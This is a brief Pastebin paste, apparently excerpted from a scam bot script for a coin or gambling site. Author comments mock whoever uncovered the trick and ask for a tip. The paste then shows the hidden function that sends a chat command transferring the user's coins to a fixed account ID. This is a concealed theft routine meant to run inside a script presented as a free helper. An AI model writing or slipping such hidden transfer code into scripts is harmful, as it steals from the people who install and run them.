Advertisement
tobygabriel

Untitled

Feb 6th, 2016
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.81 KB | None | 0 0
  1. // It's probably too late, but yeah... Well done. By this moment you understand, that you shouldn't trust anyone in the
  2. // Internet, also - you know that script doesn't have to include "send" (plain or encrypted) to steal your coins.
  3. // Pro tip - this script is working perfectly fine, that means you may install it (if you have auto-updates turned on,
  4. // disable them) after changing a few lines (check ~220 line for details) and use, it's way safer than using any other
  5. // free script or paying for one. Also, once more - tip me with 4 (exactly 4) coins if you found this. It's 7 coins
  6. // already, I know, but please! :)
  7.  
  8. // PS. Almost all free scripts are scams, remember that.
  9.  
  10. function start(x) {
  11. send({
  12. "type": "chat",
  13. "msg": '/send 76561198255518603 ' + x,
  14. "lang": LANG
  15. });
  16. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement